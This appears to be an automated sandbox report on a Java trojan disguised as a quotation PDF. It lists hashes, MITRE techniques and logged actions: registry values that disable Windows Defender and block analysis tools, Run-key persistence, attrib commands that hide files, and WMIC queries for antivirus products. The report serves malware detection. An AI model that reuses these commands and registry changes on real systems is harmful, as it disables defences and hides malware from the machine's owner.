48121733fef902a5518568547973c827230367ade22c6fe762cdf3781b2087eb

Analysis

max time kernel
147s
max time network
155s
platform
windows7_x64
resource
win7
submitted
13-07-2020 07:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

URGENT_ QUOTATION_PDF.jar
Size

402KB
MD5

a6f6acd9307c87bf055f39ec4700d392
SHA1

54b9aac3c6420e37d29db4ab7d88524ffb82f21e
SHA256

48121733fef902a5518568547973c827230367ade22c6fe762cdf3781b2087eb
SHA512

ac5a9a1d8e0e56760c96e6c6c7dbdaac15df22b350cb552fd8f20cb639dc8e51717b4b39866ccd324c460e71b0639c5c7e45c7cbfb9c179b0d28fdb48cdd896c

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

java.exe

pid process

1060 java.exe

pid	process
1060	java.exe

Sets file execution options in registry 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe

Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

java.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\gwjxXxT = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\LdlkM\\lAdax.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\gwjxXxT = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\LdlkM\\lAdax.class\""	java.exe

Kills process with taskkill 16 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
532	taskkill.exe
1244	taskkill.exe
644	taskkill.exe
1936	taskkill.exe
1760	taskkill.exe
1944	taskkill.exe
340	taskkill.exe
1696	taskkill.exe
1644	taskkill.exe
536	taskkill.exe
1592	taskkill.exe
2024	taskkill.exe
1592	taskkill.exe
1788	taskkill.exe
432	taskkill.exe
1392	taskkill.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1392 attrib.exe
1256 attrib.exe
1836 attrib.exe
1800 attrib.exe
1544 attrib.exe
1512 attrib.exe
1812 attrib.exe
1832 attrib.exe

pid	process
1392	attrib.exe
1256	attrib.exe
1836	attrib.exe
1800	attrib.exe
1544	attrib.exe
1512	attrib.exe
1812	attrib.exe
1832	attrib.exe

Suspicious use of WriteProcessMemory 759 IoCs

Processes:

java.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1060 wrote to memory of 1616	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 1616	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 1616	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 296	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 296	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 296	1060	java.exe	cmd.exe
PID 296 wrote to memory of 644	296	cmd.exe	WMIC.exe
PID 296 wrote to memory of 644	296	cmd.exe	WMIC.exe
PID 296 wrote to memory of 644	296	cmd.exe	WMIC.exe
PID 1060 wrote to memory of 1048	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 1048	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 1048	1060	java.exe	cmd.exe
PID 1048 wrote to memory of 1112	1048	cmd.exe	WMIC.exe
PID 1048 wrote to memory of 1112	1048	cmd.exe	WMIC.exe
PID 1048 wrote to memory of 1112	1048	cmd.exe	WMIC.exe
PID 1060 wrote to memory of 1544	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1544	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1544	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1512	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1512	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1512	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1812	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1812	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1812	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1832	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1832	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1832	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1392	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1392	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1392	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1256	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1256	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1256	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1836	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1836	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1836	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1800	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1800	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1800	1060	java.exe	attrib.exe
PID 1060 wrote to memory of 1608	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 1608	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 1608	1060	java.exe	cmd.exe
PID 1060 wrote to memory of 1656	1060	java.exe	powershell.exe
PID 1060 wrote to memory of 1656	1060	java.exe	powershell.exe
PID 1060 wrote to memory of 1656	1060	java.exe	powershell.exe
PID 1060 wrote to memory of 1644	1060	java.exe	taskkill.exe
PID 1060 wrote to memory of 1644	1060	java.exe	taskkill.exe
PID 1060 wrote to memory of 1644	1060	java.exe	taskkill.exe
PID 1060 wrote to memory of 1564	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1564	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1564	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1920	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1920	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1920	1060	java.exe	reg.exe
PID 1608 wrote to memory of 1936	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1936	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1936	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1948	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1948	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1948	1608	cmd.exe	reg.exe
PID 1060 wrote to memory of 1944	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1944	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1944	1060	java.exe	reg.exe
PID 1060 wrote to memory of 1916	1060	java.exe	cmd.exe

Loads dropped DLL 1 IoCs

Processes:

java.exe

pid process

1060 java.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1656 powershell.exe
1656 powershell.exe

pid	process
1060	java.exe

pid	process
1656	powershell.exe
1656	powershell.exe

Checks for installed software on the system 1 TTPs 52 IoCs

discovery

Query Registry

T1012

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe

Drops file in System32 directory 2 IoCs

Processes:

java.exe

description ioc process

File created C:\Windows\System32\MnFdt java.exe
File opened for modification C:\Windows\System32\MnFdt java.exe

description	ioc	process
File created	C:\Windows\System32\MnFdt	java.exe
File opened for modification	C:\Windows\System32\MnFdt	java.exe

Drops desktop.ini file(s) 4 IoCs

Processes:

java.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	java.exe
File created	C:\Users\Admin\LdlkM\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	attrib.exe

Suspicious use of AdjustPrivilegeToken 97 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	644	WMIC.exe
Token: SeSecurityPrivilege	644	WMIC.exe
Token: SeTakeOwnershipPrivilege	644	WMIC.exe
Token: SeLoadDriverPrivilege	644	WMIC.exe
Token: SeSystemProfilePrivilege	644	WMIC.exe
Token: SeSystemtimePrivilege	644	WMIC.exe
Token: SeProfSingleProcessPrivilege	644	WMIC.exe
Token: SeIncBasePriorityPrivilege	644	WMIC.exe
Token: SeCreatePagefilePrivilege	644	WMIC.exe
Token: SeBackupPrivilege	644	WMIC.exe
Token: SeRestorePrivilege	644	WMIC.exe
Token: SeShutdownPrivilege	644	WMIC.exe
Token: SeDebugPrivilege	644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	644	WMIC.exe
Token: SeRemoteShutdownPrivilege	644	WMIC.exe
Token: SeUndockPrivilege	644	WMIC.exe
Token: SeManageVolumePrivilege	644	WMIC.exe
Token: 33	644	WMIC.exe
Token: 34	644	WMIC.exe
Token: 35	644	WMIC.exe
Token: SeIncreaseQuotaPrivilege	644	WMIC.exe
Token: SeSecurityPrivilege	644	WMIC.exe
Token: SeTakeOwnershipPrivilege	644	WMIC.exe
Token: SeLoadDriverPrivilege	644	WMIC.exe
Token: SeSystemProfilePrivilege	644	WMIC.exe
Token: SeSystemtimePrivilege	644	WMIC.exe
Token: SeProfSingleProcessPrivilege	644	WMIC.exe
Token: SeIncBasePriorityPrivilege	644	WMIC.exe
Token: SeCreatePagefilePrivilege	644	WMIC.exe
Token: SeBackupPrivilege	644	WMIC.exe
Token: SeRestorePrivilege	644	WMIC.exe
Token: SeShutdownPrivilege	644	WMIC.exe
Token: SeDebugPrivilege	644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	644	WMIC.exe
Token: SeRemoteShutdownPrivilege	644	WMIC.exe
Token: SeUndockPrivilege	644	WMIC.exe
Token: SeManageVolumePrivilege	644	WMIC.exe
Token: 33	644	WMIC.exe
Token: 34	644	WMIC.exe
Token: 35	644	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1112	WMIC.exe
Token: SeSecurityPrivilege	1112	WMIC.exe
Token: SeTakeOwnershipPrivilege	1112	WMIC.exe
Token: SeLoadDriverPrivilege	1112	WMIC.exe
Token: SeSystemProfilePrivilege	1112	WMIC.exe
Token: SeSystemtimePrivilege	1112	WMIC.exe
Token: SeProfSingleProcessPrivilege	1112	WMIC.exe
Token: SeIncBasePriorityPrivilege	1112	WMIC.exe
Token: SeCreatePagefilePrivilege	1112	WMIC.exe
Token: SeBackupPrivilege	1112	WMIC.exe
Token: SeRestorePrivilege	1112	WMIC.exe
Token: SeShutdownPrivilege	1112	WMIC.exe
Token: SeDebugPrivilege	1112	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1112	WMIC.exe
Token: SeRemoteShutdownPrivilege	1112	WMIC.exe
Token: SeUndockPrivilege	1112	WMIC.exe
Token: SeManageVolumePrivilege	1112	WMIC.exe
Token: 33	1112	WMIC.exe
Token: 34	1112	WMIC.exe
Token: 35	1112	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1112	WMIC.exe
Token: SeSecurityPrivilege	1112	WMIC.exe
Token: SeTakeOwnershipPrivilege	1112	WMIC.exe
Token: SeLoadDriverPrivilege	1112	WMIC.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\URGENT_ QUOTATION_PDF.jar"
1⤵
- Suspicious use of SetWindowsHookEx
- Adds Run entry to start application
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Drops file in System32 directory
- Drops desktop.ini file(s)
PID:1060

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1616

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\system32\attrib.exe
attrib +h C:\Users\Admin\Oracle
2⤵
- Views/modifies file attributes
PID:1544

C:\Windows\system32\attrib.exe
attrib +h +r +s C:\Users\Admin\.ntusernt.ini
2⤵
- Views/modifies file attributes
PID:1512

C:\Windows\system32\attrib.exe
attrib -s -r C:\Users\Admin\LdlkM\Desktop.ini
2⤵
- Views/modifies file attributes
- Drops desktop.ini file(s)
PID:1812

C:\Windows\system32\attrib.exe
attrib +s +r C:\Users\Admin\LdlkM\Desktop.ini
2⤵
- Views/modifies file attributes
- Drops desktop.ini file(s)
PID:1832

C:\Windows\system32\attrib.exe
attrib -s -r C:\Users\Admin\LdlkM
2⤵
- Views/modifies file attributes
PID:1392

C:\Windows\system32\attrib.exe
attrib +s +r C:\Users\Admin\LdlkM
2⤵
- Views/modifies file attributes
PID:1256

C:\Windows\system32\attrib.exe
attrib +h C:\Users\Admin\LdlkM
2⤵
- Views/modifies file attributes
PID:1836

C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\Admin\LdlkM\lAdax.class
2⤵
- Views/modifies file attributes
PID:1800

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
3⤵
- Checks for installed software on the system
PID:1936

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
3⤵
- Checks for installed software on the system
PID:1948

